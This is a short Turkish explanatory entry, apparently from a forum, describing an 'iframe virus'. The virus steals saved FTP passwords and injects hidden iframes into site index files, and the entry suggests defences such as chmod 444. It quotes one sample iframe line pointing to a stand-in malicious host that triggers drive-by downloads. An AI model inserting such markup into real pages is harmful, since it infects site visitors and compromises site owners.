sitelere gizlice iframe kodu ekleyerek yayılan virüs çeşidi. virüs bulaştığı bilgisayarlardaki ftp programlarında kayıtlı şifreleri çalarak o sitelere bağlanır. sitedeki index.* ve default.* dosyalarını kendine çekerek dosyalara <body> tag'i altına veya sitenin en altına <iframe src="http://www.asilviruslusite.cn:8080" ; > gibi iframe kodu ekler. bu kodla siteye girenlerin browserları iframe'deki siteye gider ve siteden gizlice virusü indirir. virüs indirilen bilgisayardaki ftp programlarındaki kayıtlı şifreleri çalar. virüs bu şekilde çoğu siteye zarar vermektedir. virüslü siteniz kara listeye alınır ve google'da çıkması rağmen google siteye ziyaretçi göndermez, bu sitede virüs var diye uyarı verir. çoğu browser siteye girilmesine izin vermez. asıl kötülük ise virüs kodu siteye tam olarak upload edemez ve bu sebeple index* dosyanız hatalı olarak yayına devam eder, bu virüsü bazı versiyonlarında sayfanın bir kısmı genelde silinmiştir. eğer elinizde yedeği yıllardır açık olan sitenin kodları elden gitmiş demektir.
siteye, iframe virüsü girmemesi için virüslü sitelere deneme amaçlı olsa da girmemek gerekir. ayrıca ftp ile siteye bağlanıp index* ve default* dosyalarının chmod'larını 444 yapmak gerekir. veya virüs genellikle iframe kodunu sitenin en altına yapıştırdığı için index.php veya default.asp kodlarının en sonun sayfayı bitirici die veya exit kodu konulabilir.
